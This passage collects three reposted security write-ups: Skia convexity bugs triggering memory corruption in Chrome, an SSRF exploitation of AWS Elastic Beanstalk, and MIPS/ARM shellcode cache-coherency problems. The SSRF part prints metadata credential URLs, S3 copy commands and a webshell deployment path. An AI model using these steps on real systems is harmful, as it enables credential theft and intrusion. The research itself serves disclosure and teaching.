not, and if we apply any affine transform to the path, the resulting path will also be treated as convex. The affine transform can be crafted so that it enlarges, rotates and positions concavities so that, once the convex drawing algorithm is used on the path, memory corruption issues are triggered. Additionally (untested) it might be possible that, due to precision errors, computing a transformation itself might introduce tiny concavities when there were none previously. These concavities might then be enlarged in subsequent path transformations. Unfortunately for computational geometry coders everywhere, accurately determining whether a path is convex or not in floating point precision (regardless if single or double floating point precision is used) is very difficult / almost impossible to do. So, how does Skia do it? Convexity computations in Skia happen in the Convexicator class, where Skia uses several criteria to determine if a path is convex: It traverses a path and computes changes of direction. For example, if we follow a path and always turn left (or always turn right), the path must be convex. It checks if a path is both x- and y-monotone When analyzing this Convexicator class, I noticed two cases where a concave paths might pass as convex: As can be seen here, any pair of points for which the squared distance does not fit in a 32-bit float (i.e. distance between the points smaller than ~3.74e-23) will be completely ignored. This, of course, includes sequences of points which form concavities. Due to tolerances when computing direction changes (e.g here and here) even concavities significantly larger than 3.74e-23 can easily passing the convexity check (I experimented with values around 1e-10). However, such concavities must also pass the x- and y-monotonicity check. Note that, in both cases, a path needs to have some larger edges (for which direction can be properly computed) in order to be declared convex, so just having a tiny path is not sufficient. Fortunately, a line is considered convex by Skia, so it is sufficient to have a tiny concave shape and a single point at a sufficient distance away from it for a path to be declared convex. Alternately, by combining both issues above, one can have tiny concavities along the line, which is a technique I used to create paths that are both small and clearly concave when transformed (Note: the size of the path is often a factor when determining which algorithms can handle which paths). To make things clearer, let’s see an example of bypassing the convexity check with a polygon that is both x- and y- monotone. Consider the polygon in Image 5 (a) and imagine that the part inside the red circle is much smaller than depicted. Note that this polygon is concave, but it is also both x-monotone and y-monotone. Thus, if the concavity depicted in the red circle is sufficiently small, the polygon is going to be declared convex. Now, let’s see what we can do with it by applying an affine transform - firstly, we can rotate it and make it non-y-monotone as depicted in Image 5 (b). Having a polygon that is not y-monotone will be very important for triggering memory corruption issues later. Secondly, we can scale (enlarge) and translate the concavity to fill the whole drawing area, and when the concavity is intersected with the drawing area we’ll end up with something like depicted in Image 5 (c), in which the polygon is clearly concave and the concavity is no longer small. (a) (b) (c) Image 5: Bypassing the convexity check with a monotone polygon The walk_convex_edges algorithm Now that we can bypass the convexity check in various ways, let’s see how it can lead to problems. To understand this, let’s first examine how Skia's algorithm for drawing (filling) convex paths works (code here). Let’s consider an example in Image 6 (a). The first thing Skia does is, it extracts polygon (path) lines (edges) and sorts them according to the coordinates of the topmost point. The sorting order is top-to-bottom, and if two points have the same y coordinate, then the one with a smaller x coordinate goes first. This has been done for the polygon in Image 6 (a) and the numbers next to the edges depict their order. The bottommost edge is ignored because it is fully horizontal and thus not needed (you’ll see why in a moment). Next, the edges are traversed and the area between them drawn. First, the first two edges (edges 1 and 2) are taken and the area between them is filled from top to bottom - this is the red area in Image 6 (b). After this, edge 1 is “done” and it is replaced by the next edge - edge 3. Now, area between edge 2 and edge 3 is filled (orange area). Next, edge 2 is “done” and is replaced by the next in line: edge 4. Finally, the area between edges 3 and 4 is rendered. Since there are no more edges, the algorithm stops. (a) (b) Image 6: Skia convex path filling algorithm Note that, in the implementation, the code for rendering areas where both edges are vertical (here) is different than the code for rendering areas where at least one edge is at an angle (here). In the first case, the whole area is rendered in a single call to blitter->blitRect() while in the second case, the area is rendered line-by-line and for each line blitter->blitH() is called. Of special interest here is the local_top variable, essentially keeping track of the next y coordinate to fill. In the case of drawing non-vertical edges, this is simply incremented for every line drawn. In case of vertical lines (drawing a rectangle), after the rectangle is drawn, local_top is set based on the coordinates of the current edge pair. This difference in behavior is going to be useful later. One interesting observation about this algorithm is that it would not only work correctly for convex paths - it would work correctly for all paths that are y-monotone. Using it for y-monotone paths would also have another benefit: Checking if a path is y-monotone could be performed faster and more accurately than checking if a path is convex. Variant 1 Now, let’s see how drawing concave paths using this algorithm can lead to problems. As the first example, consider the polygon in Image 7 (a) with the edge ordering marked. (a) (b) Image 7: An example of a concave path that causes problem in Skia if rendered as convex Image 7 (b) shows how the shape is rendered. First, a large red area between edges 1 and 2 is rendered. At this point, both edges 1 and 2 are done, and the orange rectangular area between areas 3 and 4 is rendered next. The purpose of this rectangular area is simply to reset the local_top variable to its correct value (here), otherwise local_top would just continue increasing for every line drawn. Next, the green area between edges 3 and 5 is drawn - and this causes problems. Why? Because Skia expects to always draw pixels in a top-to-bottom, left-to right order, e.g. point (x, y) = (1, 1) is always going to be drawn before (1, 2) and (1, 1) is also going to be always drawn before (2, 1). However, in the example above, the area between edges 1 and 2 will have (partially) the same y values as the area between edges 3 and 5. The second area is going to be drawn, well, second, and yet it contains a subset of same y coordinates and lower x coordinates than the first region. Now let’s see how this leads to memory corruption. In the original bug, a concave (but presumed convex) path was used as a clipping region (every subsequent draw call draws only inside the clipping region). When setting a path as a clipping region, it also gets “drawn”, but instead of drawing pixels on the screen, they just get saved so they could be intersected with what gets drawn afterwards. The pixels are saved in SkRgnBuilder::blitH and actually, individual pixels aren't saved but instead the entire range of pixels (from x to x + width at height y) gets stored at once to save space. These ranges - you guessed it - also depend on the correct drawing order as can be seen here (among other places). Now let’s see what happens when a second path is drawn inside a clipping region with incorrect ordering. If antialiasing is turned on when drawing the second path, SkRgnClipBlitter::blitAntiH gets called for every range drawn. This function needs to intersect the clip region ranges with the range being drawn and only output the pixels that are present in both. For that purpose, it gets the clipping ranges that intersect the line being drawn one by one and processes them. SkRegion::Spanerator::next is used to return the next clipping range. Let’s assume the clipping region for the y coordinate currently drawn has the ranges [start x, end x] = [10, 20] and [0, 2] and the line being drawn is [15,16]. Let’s also consider the following snippet of code from SkRegion::Spanerator::next: if (runs[0] >= fRight) { fDone = true; return false; } SkASSERT(runs[1] > fLeft); if (left) { *left = SkMax32(fLeft, runs[0]); } if (right) { *right = SkMin32(fRight, runs[1]); } fRuns = runs + 2; return true; where left and right are the output pointers, fLeft and fRight are going to be left and right x value of the line being drawn (15 and 16 respectively), while runs is a pointer to clipping region ranges that gets incremented for every iteration. For the first clipping line [10, 20] this is going to work correctly, but let’s see what happens for the range [0, 2]. Firstly, the part if (runs[0] >= fRight) { fDone = true; return false; } is supposed to stop the algorithm, but due to incorrect ordering, it does not work (16 >= 0 is false). Next, left is computed as Max(15, 0) = 15 and right as Min(16, 2) = 2. Note how left is larger than right. This is going to result in calling SkAlphaRuns::Break with a negative count argument on the line, SkAlphaRuns::Break((int16_t*)runs, (uint8_t*)aa, left - x, right - left); which then leads to out-of-bounds write on the following lines in SkAlphaRuns::Break: x = count; ... alpha[x] = alpha[0]; Why did this result in out-of-bounds write on the stack? Because, in the case of drawing only two pixels, the range arrays passed to SkRgnClipBlitter::blitAntiH and subsequently SkAlphaRuns::Break are allocated on stack in SkBlitter::blitAntiH2 here. Triggering the issue in a browser This is great - we have a stack out-of-bounds write in Skia, but can we trigger this in Chrome? In general, in order to trigger the bug, the following conditions must be met: We control a path (SkPath) object Something must be done to the path object that computes its convexity The same path must be transformed and filled / set as a clip region My initial idea was to use a CanvasRenderingContext2D API and render a path twice: once without any transform just to establish its convexity and a second time with a transformation applied to the CanvasRenderingContext2D object. Unfortunately, this approach won’t work - when drawing a path, Skia is going to copy it before applying a transformation, even if there is effectively no transformation set (the transformation matrix is an identity matrix). So the convexity property is going to be set on a copy of the path and not the one we get to keep the reference to. Additionally, Chrome itself makes a copy of the path object when calling any canvas functions that cause a path to be drawn, and all the other functions we can call with a path object as an argument do not check its convexity. However, I noticed Chrome canvas still draws my convex/concave paths incorrectly - even if I just draw them once. So what is going on? As it turns out, when drawing a path using Chrome canvas, the path won’t be drawn immediately. Instead, Chrome just records the draw path operation using RecordPaintCanvas and all such draw operations will be executed together, at a later time. When a DrawPathOp object (representing a path drawing operation) is created, among other things, it is going to check if the path is “slow”, and one of the criteria for this is path convexity: int DrawPathOp::CountSlowPaths() const { if (!flags.isAntiAlias() || path.isConvex()) return 0; … } All of this happens before the path is transformed, so we seemingly have a perfect scenario: We control a path, its convexity is checked, and the same path object later gets transformed and rendered. The second problem with canvas is that, in the previously described approach to converting the issue to memory corruption, we relied on SkRgnBuilder, which is only used when a clip region has antialiasing turned off, while everything in Chrome canvas is going to be drawn with antialiasing on. Chrome also implements the OffscreenCanvas API which sets clip antialiasing to off (I’m not sure if this is deliberate or a bug), but OffscreenCanvas does not use RecordPaintCanvas and instead draws everything immediately. So the best way forward seemed to be to find some other variants of turning convexity issues into memory corruption, ones that would work with antialiasing on for all operations. Variant 2 As it happens, Skia implements three different algorithms for path drawing with antialiasing on and one of these (SkScan::SAAFillPath, using supersampled antialiasing) uses essentially the same filling algorithm we analyzed before. Unfortunately, this does not mean we can get to the same buffer overflow as before - as mentioned before SkRgnBuilder / SkRgnClipBlitter are not used with antialiasing on. However, we have other options. If we simply fill the path (no clip region needed this time) with the correct algorithm, SuperBlitter::blitH is going to be called without respecting the top-to-bottom, left-to-right drawing order. SuperBlitter::blitH calls SkAlphaRuns::add and as the last argument, it passes the rightmost x coordinate we have drawn so far. This is subtracted from the currently drawn x coordinate on the line: x -= offsetX; And if x is smaller than something we drew already (for the same y coordinate) it becomes negative. This is of course exactly what happens when drawing pixels out of Skia expected order. The result of this is calling SkAlphaRuns::Break with a negative “x” argument. This skips the entire first part of the function (the “while (x > 0)” loop), and continues to the second part: runs = next_runs; alpha = next_alpha; x = count; for (;;) { int n = runs[0]; SkASSERT(n > 0); if (x < n) { alpha[x] = alpha[0]; runs[0] = SkToS16(x); runs[x] = SkToS16(n - x); break; } x -= n; if (x <= 0) { break; } runs += n; alpha += n; } Here, x gets overwritten with count, but the problem is that runs[0] is not going to be initialized (the first part of the function is supposed to initialize it), so in int n = runs[0]; an uninitialized variable gets read into n and is used as an offset into arrays, which can result in both out-of-bounds read and out-of-bounds write when the following lines are executed: runs += n; alpha += n; alpha[x] = alpha[0]; runs[0] = SkToS16(x); runs[x] = SkToS16(n - x); The shape needed to trigger this is depicted in image 8 (a). (a) (b) Image 8: Shape used to trigger variant 2 in Chrome This shape is similar to the one previously depicted, but there are some differences, namely: We must render two ranges for the same y coordinate immediately one after another, where the second range is going to be to the left of the first range. This is accomplished by making the rectangular area between edges 3 and 4 (orange in Image 8 (b)) less than a pixel wide (so it does not in fact output anything) and making the green area between edges 5 and 6 (green in the image) only a single pixel high. The second range for the same y must not start at x = 0. This is accomplished by edge 5 ending a bit away from the left side of the image bounds. This variant can be triggered in Chrome by simply drawing a path - the poc can be seen here. Variant 3 Uninitialized variable bug in a browser is nice, but not as nice as a stack out-of-bounds write, so I looked for more variants. For the next and final one, the path we need is a bit more complicated and can be seen in Image 9 (a) (note that the path is self-intersecting). (a) (b) Image 9: A shape used to trigger a stack buffer overflow in Chrome Let’s see what happens in this one (assume the same drawing algorithm is used as before): First, edges 1, 2, 3 and 4 are handled. This part is drawn incorrectly (only red and orange areas in Image 9 (b) are filled), but the details aren’t relevant for triggering the bug. For now, just note that edges 2 and 4 terminate at the same height, so when they are done, edges 2 and 4 are both replaced with edges 5 and 6. The purpose of edges 5 and 6 is once again to reset the local_top variable - it will be set to the height shown as the red dotted line in the image. Now, edge 5 and 6 will both get replaced with edges 7 and 8 - and here is the issue: Edges 7 and 8 are not going to be drawn for y coordinates between the green and blue line, as they are supposed to. Instead, they are going to be rendered all the way from the red line to the blue line. Note the very low steepness of edges 7 and 8 - for every line, the x coordinates to draw to are going to be significantly increased and, given that they are going to be drawn in a larger number of iterations than intended, the x coordinate will eventually spill past the image bounds. This causes a stack out-of-bounds write if a path is drawn using SkScan::SAAFillPath algorithm with MaskSuperBlitter. MaskSuperBlitter can only handle very small paths (up to 32x32 pixels) and contains a fixed-size buffer that is going to be filled with 8-bit opacity for each pixel of the path region. Since MaskSuperBlitter is a local variable in SkScan::SAAFillPath, the (fixed-size) buffer is going to be allocated on the stack. When the path above is drawn, there aren’t any bounds checks on the opacity buffer (there are only debug asserts here and here), which leads to an out-of bounds write on the stack. Specifically (due to how opacity buffer works) we can increment values on the stack past the end of the buffer by a small amount. This variant is again triggerable in Chrome by simply drawing a path to the Canvas and gives us a pretty nice primitive for exploitation - note that this is not a linear overflow and offsets involved can be controlled by the slope of edges 7 and 8. The PoC can be seen here - most of it is just setting up the path coordinates so that the path is initially declared convex and at the same time small enough so that MaskSuperBlitter can render it. How to make the shape needed to trigger the bug appear convex to Skia but also fit in 32x32 pixels? Note that the shape is already x-monotone. Now assume we squash it in the y direction until it becomes (almost) a line lying on the x axis. It is still not y-monotone because there are tiny shifts in y direction along the line - but if we skew (or rotate) it just a tiny amount, so that it is no longer parallel to the x axis, it also becomes y-monotone. The only parts we can’t make monotone are vertical edges (edges 5 and 6), but if you squashed the shape sufficiently they become so short that their square length does not fit in a float and are ignored by the Skia convexity test. This is illustrated in Image 10. In reality these steps need to be followed in reverse, as we start with a shape that needs to pass the Skia convexity test and then transform it to the shape depicted in Image 9. (a) (b) (c) Image 10: Making the shape from Image 9 appear convex, (a) original shape, (b) shape after y-scale, (c) shape after y-scale rotation On fixing the issue Initially, Skia developers attempted to fix the issue by not propagating convexity information after the transformation, but only in some cases. Specifically, the convexity was still propagated if the transformation consisted only of scale and translation. Such a fix is insufficient because very small concavities (where square distance between points is too small to fit in a 32-bit float) could still be enlarged using only scale transformation and could form shapes that would trigger memory corruption issues. After talking to the Skia developers, a stronger patch was created, modifying the convex drawing algorithm in a way that passing concave shapes to it won’t result in memory corruption, but rather in returning from the draw operation early. This patch shipped, along with other improvements, in Chrome 72. It isn’t uncommon that an initial fix for a vulnerability is insufficient. But the saving grace for Skia, Chrome and most open source projects is that the bug reporter can see the fix immediately when it’s created and point out the potential drawbacks. Unfortunately, this isn’t the case for many closed-source projects or even open-sourced projects where the bug fixing process is opaque to the reporter, which caused mishaps in the past. However, regardless of the vendor, we at Project Zero are happy to receive information on the fixes early and comment on them before they are released to the public. Conclusion There are several things worth highlighting about this bug. Firstly, computational geometry is hard. Seriously. I have some experience with it and, while I can’t say I’m an expert I know that much at least. Handling all the special cases correctly is a pain, even without considering security issues. And doing it using floating point arithmetic might as well be impossible. If I was writing a graphics library, I would convert floats to fixed-point precision as soon as possible and wouldn’t trust anything computed based on floating-point arithmetic at all. Secondly, the issue highlights the importance of doing variant analysis - I discovered it based on a public bug report and other people could have done the same. Thirdly, it highlights the importance of defense-in-depth. The latest patch makes sure that drawing a concave path with convex path algorithms won’t result in memory corruption, which also addresses unknown variants of convexity issues. If this was implemented immediately after the initial report, Project Zero would now have one blog post less Posted by Ben at 10:08 AM Sursa: https://googleprojectzero.blogspot.com/2019/02/the-curious-case-of-convexity-confusion.html
-
- 1
-
-
Exploiting SSRF in AWS Elastic Beanstalk February 1, 2019 In this blog, Sunil Yadav, our lead trainer for “Advanced Web Hacking” training class, will discuss a case study where a Server-Side Request Forgery (SSRF) vulnerability was identified and exploited to gain access to sensitive data such as the source code. Further, the blog discusses the potential areas which could lead to Remote Code Execution (RCE) on the application deployed on AWS Elastic Beanstalk with Continuous Deployment (CD) pipeline. AWS Elastic Beanstalk AWS Elastic Beanstalk, is a Platform as a Service (PaaS) offering from AWS for deploying and scaling web applications developed for various environments such as Java, .NET, PHP, Node.js, Python, Ruby and Go. It automatically handles the deployment, capacity provisioning, load balancing, auto-scaling, and application health monitoring. Provisioning an Environment AWS Elastic Beanstalk supports Web Server and Worker environment provisioning. Web Server environment – Typically suited to run a web application or web APIs. Worker Environment – Suited for background jobs, long-running processes. A new application can be configured by providing some information about the application, environment and uploading application code in the zip or war files. Figure 1: Creating an Elastic Beanstalk Environment When a new environment is provisioned, AWS creates an S3 Storage bucket, Security Group, an EC2 instance. It also creates a default instance profile, called aws-elasticbeanstalk-ec2-role, which is mapped to the EC2 instance with default permissions. When the code is deployed from the user computer, a copy of the source code in the zip file is placed in the S3 bucket named elasticbeanstalk–region-account-id. Figure 2: Amazon S3 buckets Elastic Beanstalk doesn’t turn on default encryption for the Amazon S3 bucket that it creates. This means that by default, objects are stored unencrypted in the bucket (and are accessible only by authorized users). Read more: https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/AWSHowTo.S3.html Managed Policies for default Instance Profile – aws-elasticbeanstalk-ec2-role: AWSElasticBeanstalkWebTier – Grants permissions for the application to upload logs to Amazon S3 and debugging information to AWS X-Ray. AWSElasticBeanstalkWorkerTier – Grants permissions for log uploads, debugging, metric publication, and worker instance tasks, including queue management, leader election, and periodic tasks. AWSElasticBeanstalkMulticontainerDocker – Grants permissions for the Amazon Elastic Container Service to coordinate cluster tasks. Policy “AWSElasticBeanstalkWebTier” allows limited List, Read and Write permissions on the S3 Buckets. Buckets are accessible only if bucket name starts with “elasticbeanstalk-”, and recursive access is also granted. Figure 3: Managed Policy – “AWSElasticBeanstalkWebTier” Read more: https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/concepts.html Analysis While we were continuing with our regular pentest, we came across an occurrence of Server-Side Request Forgery (SSRF) vulnerability in the application. The vulnerability was confirmed by making a DNS Call to an external domain and this was further verified by accessing the “http://localhost/server-status” which was configured to only allow localhost to access it as shown in the Figure 4 below. http://staging.xxxx-redacted-xxxx.com/view_pospdocument.php?doc=http://localhost/server-status Figure 4: Confirming SSRF by accessing the restricted page Once SSRF was confirmed, we then moved towards confirming that the service provider is Amazon through server fingerprinting using services such as https://ipinfo.io. Thereafter, we tried querying AWS metadata through multiple endpoints, such as: http://169.254.169.254/latest/dynamic/instance-identity/document http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanstalk-ec2-role We retrieved the account ID and Region from the API “http://169.254.169.254/latest/dynamic/instance-identity/document”: Figure 5: AWS Metadata – Retrieving the Account ID and Region We then retrieved the Access Key, Secret Access Key, and Token from the API “http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role”: Figure 6: AWS Metadata – Retrieving the Access Key ID, Secret Access Key, and Token Note: The IAM security credential of “aws-elasticbeanstalk-ec2-role” indicates that the application is deployed on Elastic Beanstalk. We further configured AWS Command Line Interface(CLI), as shown in Figure 7: Figure 7: Configuring AWS Command Line Interface The output of “aws sts get-caller-identity” command indicated that the token was working fine, as shown in Figure 8: Figure 8: AWS CLI Output : get-caller-identity So, so far, so good. Pretty standard SSRF exploit, right? This is where it got interesting….. Let’s explore further possibilities Initially, we tried running multiple commands using AWS CLI to retrieve information from the AWS instance. However, access to most of the commands were denied due to the security policy in place, as shown in Figure 9 below: Figure 9: Access denied on ListBuckets operation We also know that the managed policy “AWSElasticBeanstalkWebTier” only allows to access S3 buckets whose name start with “elasticbeanstalk”: So, in order to access the S3 bucket, we needed to know the bucket name. Elastic Beanstalk creates an Amazon S3 bucket named elasticbeanstalk-region-account-id. We found out the bucket name using the information retrieved earlier, as shown in Figure 4. Region: us-east-2 Account ID: 69XXXXXXXX79 Now, the bucket name is “elasticbeanstalk-us-east-2-69XXXXXXXX79”. We listed bucket resources for bucket “elasticbeanstalk-us-east-2-69XXXXXXXX79” in a recursive manner using AWS CLI: aws s3 ls s3://elasticbeanstalk-us-east-2-69XXXXXXXX79/ Figure 10: Listing S3 Bucket for Elastic Beanstalk We got access to the source code by downloading S3 resources recursively as shown in Figure 11. aws s3 cp s3://elasticbeanstalk-us-east-2-69XXXXXXXX79/ /home/foobar/awsdata –recursive Figure 11: Recursively copy all S3 Bucket Data Pivoting from SSRF to RCE Now that we had permissions to add an object to an S3 bucket, we uploaded a PHP file (webshell101.php inside the zip file) through AWS CLI in the S3 bucket to explore the possibilities of remote code execution, but it didn’t work as updated source code was not deployed on the EC2 instance, as shown in Figure 12 and Figure 13: Figure 12: Uploading a webshell through AWS CLI in the S3 bucket Figure 13: 404 Error page for Web Shell in the current environment We took this to our lab to explore on some potential exploitation scenarios where this issue could lead us to an RCE. Potential scenarios were: Using CI/CD AWS CodePipeline Rebuilding the existing environment Cloning from an existing environment Creating a new environment with S3 bucket URL Using CI/CD AWS CodePipeline: AWS CodePipeline is a CI/CD service which builds, tests and deploys code every time there is a change in code (based on the policy). The Pipeline supports GitHub, Amazon S3 and AWS CodeCommit as source provider and multiple deployment providers including Elastic Beanstalk. The AWS official blog on how this works can be found here: The software release, in case of our application, is automated using AWS Pipeline, S3 bucket as a source repository and Elastic Beanstalk as a deployment provider. Let’s first create a pipeline, as seen in Figure 14: Figure 14: Pipeline settings Select S3 bucket as source provider, S3 bucket name and enter the object key, as shown in Figure 15: Figure 15: Add source stage Configure a build provider or skip build stage as shown in Figure 16: Figure 16: Skip build stage Add a deploy provider as Amazon Elastic Beanstalk and select an application created with Elastic Beanstalk, as shown in Figure 17: Figure 17: Add deploy provider A new pipeline is created as shown below in Figure 18: Figure 18: New Pipeline created successfully Now, it’s time to upload a new file (webshell) in the S3 bucket to execute system level commands as show in Figure 19: Figure 19: PHP webshell Add the file in the object configured in the source provider as shown in Figure 20: Figure 20: Add webshell in the object Upload an archive file to S3 bucket using the AWS CLI command, as shown in Figure 21: Figure 21: Cope webshell in S3 bucket aws s3 cp 2019028gtB-InsuranceBroking-stag-v2.0024.zip s3://elasticbeanstalk-us-east-1-696XXXXXXXXX/ The moment the new file is updated, CodePipeline immediately starts the build process and if everything is OK, it will deploy the code on the Elastic Beanstalk environment, as shown in Figure 22: Figure 22: Pipeline Triggered Once the pipeline is completed, we can then access the web shell and execute arbitrary commands to the system, as shown in Figure 23. Figure 23: Running system level commands And here we got a successful RCE! Rebuilding the existing environment: Rebuilding an environment terminates all of its resources, remove them and create new resources. So in this scenario, it will deploy the latest available source code from the S3 bucket. The latest source code contains the web shell which gets deployed, as shown in Figure 24. Figure 24: Rebuilding the existing environment Once the rebuilding process is successfully completed, we can access our webshell and run system level commands on the EC2 instance, as shown in figure 25: Figure 25: Running system level commands from webshell101.php Cloning from the existing environment: If the application owner clones the environment, it again takes code from the S3 bucket which will deploy the application with a web shell. Cloning environment process is shown in Figure 26: Figure 26: Cloning from an existing Environment Creating a new environment: While creating a new environment, AWS provides two options to deploy code, one for uploading an archive file directly and another to select an existing archive file from the S3 bucket. By selecting the S3 bucket option and providing an S3 bucket URL, the latest source code will be used for deployment. The latest source code contains the web shell which gets deployed. References: https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/concepts.html https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/iam-instanceprofile.html https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/AWSHowTo.S3.html https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-welcome.html https://gist.github.com/BuffaloWill/fa96693af67e3a3dd3fb https://ipinfo.io <BH Marketing> Our Advanced Web Hacking class at Black Hat USA contains this and many more real-world examples. Registration is now open. </BH Marketing> Sursa: https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/
-
- 2
-
-
Why is My Perfectly Good Shellcode Not Working?: Cache Coherency on MIPS and ARM 2/5/2019 gdb showing nonsensical crashes To set the scene: You found a stack buffer overflow, wrote your shellcode to an executable heap or stack, and used your overflow to direct the instruction pointer to the address of your shellcode. Yet your shellcode is inconsistent, crashes frequently, and core dumps show the processor jumped to an address halfway through your shellcode, seemingly without executing the first half. The symptoms haven’t helped diagnose the problem, they’ve left you more confused. You’ve tried everything. Changing the size of the buffer, page aligning your code, even waiting extra cycles, but your code is still broken. When you turn on debug mode for the target process, or step through with a debugger, it works perfectly, but that isn’t good enough. Your code doesn’t self-modify, so you shouldn’t have to worry about cache coherency, right? We accessed a root console via UART That’s what happened to us on MIPS when we exploited a TP-Link router. In order to save time, we added a series of NOPs from the beginning of the shellcode buffer to where the processor often “jumped,” and put the issue in the queue to explore later. We encountered a similar problem on ARM when we exploited Devil’s Ivy on an ARM chip. We circumvented the problem by not using self-modifying shellcode, and logged the issue so we could follow up later. Since we finished exploring lateral attacks, the research team has taken some time to dig into the shellcoding oddities that puzzled us earlier, and we’d like to share what we've learned. MIPS: A Short Explanation and Solution Overview of MIPS caches Our MIPS shellcode did not self-modify, but it ran afoul of cache coherency anyway. MIPS maintains two caches, a data cache and an instruction cache. These caches are designed to increase the speed of memory access by conducting reads and writes to main memory asynchronously. The caches are completely separate, MIPS writes data to the data cache and instructions to the instruction cache. To save time, the running process pulls instructions and data from the caches rather than from main memory. When a value is not available from the cache, the processor syncs the cache with main memory before the process tries again. When the TP-Link’s MIPS processor wrote our shellcode to the executable heap it only wrote the shellcode to the data cache, not to main memory. Modified areas in the data cache are marked for later syncing with main memory. However, although the heap was marked executable, the processor didn’t automatically recognize our bytes as code and never updated the instruction cache with our new values. What’s more, even if the instruction cache synced with main memory before our code ran, it still wouldn’t have received our values because they had not yet been written from the data cache to main memory. Before our shellcode could run, it needed to move from the data cache to the instruction cache, by way of main memory, and that wasn't happening. This explained the strange crashes. After our stack buffer overflow overwrote the stored return address with our shellcode address, the processor directed execution to the correct location because the return address was data. However, it executed the old instructions that still occupied the instruction cache, rather than the ones we had recently written to the data cache. The buffer had previously been filled mostly by zeros, which MIPS interprets as NOPs. Core dumps showed an apparent “jump” to the middle of our shellcode because the processor loaded our values just before, or during, generating the core dump. The processor hadn't synced because it assumed that the instructions that had been at that location would still be at that location, a reasonable assumption given that code does not usually change mid-execution. There are legitimate reasons for modifying code (most importantly, every time a new process loads), so chip manufacturers generally provide ways to flush the data and instruction cache. One easy way to cause a data cache write to main memory is to call sleep(), a well known strategy which causes the processor to suspend operation for a specified period of time. Originally our ROP chain only consisted of two addresses, one to calculate the address of the shellcode buffer from two registers we controlled on the stack, and the next to jump to the calculated address. To call sleep() we inserted two addresses before the original ROP chain. The first code snippet set $a0 to 1. $a0 is the first argument to sleep and tells the processor how many milliseconds to sleep. This code also loaded the registers $ra and $s0 from the stack, returning to the value we placed on the stack for $ra. Setting up call to sleep() The next code snippet called sleep(). Since sleep() returned to the return address passed into the function, we needed the return address to be something we controlled. We found a location that loaded the return address from the stack and then jumped to a register. We were pleased to find the code snippet below, which transfers the value in $s1, which we set to sleep(), into $t9 and then calls $t9 after loading $ra from the stack. Calling sleep() From there, we executed the rest of the ROP chain and finally achieved consistent execution of our exploit. Read on for more details about syncing the MIPS cache and why calling sleep() works or scroll down for a discussion of ARM cache coherency problems. In Depth on MIPS Caching Most of the time when we talk about syncing data, we're trying to avoid race conditions between two entities sharing a data buffer. That is, at a high level, the problem we encountered, essentially a race condition between syncing our shellcode and executing it. If syncing won, the code would work, if execution won, it would fail. Because the caches do not sync frequently, as syncing is a time consuming process, we almost always lost this race. According to the MIPS Software Training materials (PDF) on caches, whenever we write instructions that the OS would normally write, we need to make the data cache and main memory coherent and then mark the area containing the old instructions in the instruction cache invalid, which is what the OS does every time it loads a new process into memory. The data and instruction caches store between 8 and 64KBs of values, depending on the MIPS processor. The instruction cache will sync with main memory if the processor encounters a syncing instruction, execution is directed to a location outside the bounds of what is stored in the instruction cache, and after cache initialization. With a jump to the heap from a library more than a page away, we can be fairly certain that the values there will not be in the instruction cache, but we still need to write the data cache to main memory. We learned from devttys0 that sleep() would sync the caches. We tried it out and our shellcode worked! We also learned about another option from emaze, calling cacheflush() from libc will more precisely flush the area of memory that you require. However, it requires the address, number of bytes, and cache to be flushed, which is difficult from ROP. Because calling sleep(), with its single argument, was far easier, we dug a little deeper to find out why it's so effective. During sleep, a process or thread gives up its allotted time and yields execution to the next scheduled process. However, a context switch on MIPS does not necessitate a cache flush. On older chips it may, but on modern MIPS instruction cache architectures, cached addresses are tagged with an ID corresponding to the process they belong to, resulting in those addresses staying in cache rather than slowing down the context switch process any further. Without these IDs, the processor would have to sync the caches during every context switch, which would make context switching even more expensive. So how did sleep() trigger a data cache write back to main memory? The two ways data caches are designed to write to main memory are write-back and write-through. Write-through means every memory modification triggers a write out to main memory and the appropriate cache. This ensures data from the cache will not be lost, but greatly slows down processing speed. The other method is write-back, where data is written only to the copy in the cache, and the subsequent write to main memory is postponed for an optimal time. MIPS uses the write-back method (if it didn’t, we wouldn’t have these problems) so we need to wait until the blocks of memory in the cache containing the modified values are written to main memory. This can be triggered a few different ways. One trigger is any Direct Memory Access (DMA) . Because the processor needs to ensure that the correct bytes are in memory before access occurs, it syncs the data cache with main memory to complete any pending writes to the selected memory. Another trigger is when the data cache requires the cache blocks containing modified values for new memory. As noted before, the data cache size is at least 8KB, large enough that this should rarely happen. However, during a context switch, if the data cache requires enough new memory that it needs in-use blocks, it will trigger a write-back of modified data, moving our shellcode from the data cache to main memory. As before, when the sleeping process woke, it caused an instruction cache miss when directing execution to our shellcode, because the address of the shellcode was far from where the processor expected to execute next. This time, our shellcode was in main memory, ready to be loaded into the instruction cache and executed. Wait, Isn't This a Problem on ARM Too? It sure is. ARM maintains separate data and instruction caches too. The difference is we’re far less likely to find executable heaps and stacks (which was the default on MIPS toolchains until recently). The lack of executable space ready for shellcode forces us to allocate a new buffer, copy our shellcode to it, mark it executable, and then jump to it. Using mprotect to mark a buffer executable triggers a cache flush, according to the Android Hacker’s Handbook. The section also includes an important and very helpful note. Excerpt from Chapter 9, Separate Code and Instruction Cache, "Android Hackers Handbook" However there are still times we need to sync the instruction cache on ARM, as in the case of exploiting Devil’s Ivy. We put together a ROP chain that gave us code execution and wrote self-modifying shellcode that decoded itself in place because incoming data was heavily filtered. Although we included code that we thought would sync the instruction cache, the code crashed in the strangest ways. Again, the symptoms were not even close to what we expected. We saw the processor raise a segfault while executing a perfectly good piece of shellcode, a missed register write that caused an incomprehensible crash ten lines of code later, and a socket that connected but would not transmit data. Worse yet, when we attached gdb and went through the code step by step, it worked perfectly. There was no behavior that pointed to an instruction cache issue, and nothing easy to search for help on, other than “Why isn’t my perfectly good shellcode working!?” By now you can guess what the problem was, and we did too. If you are on ARMv7 or newer and running into odd problems, one solution is to execute data barrier and instruction cache sync instructions after you write but before you execute your new bytes, as shown below. ARMv7+ cache syncing instructions On ARMv6, instead of DSB and ISB, ARM provided MCR instructions to manipulate the cache. The following instructions have the same effect as DSB and ISB above, though prior to 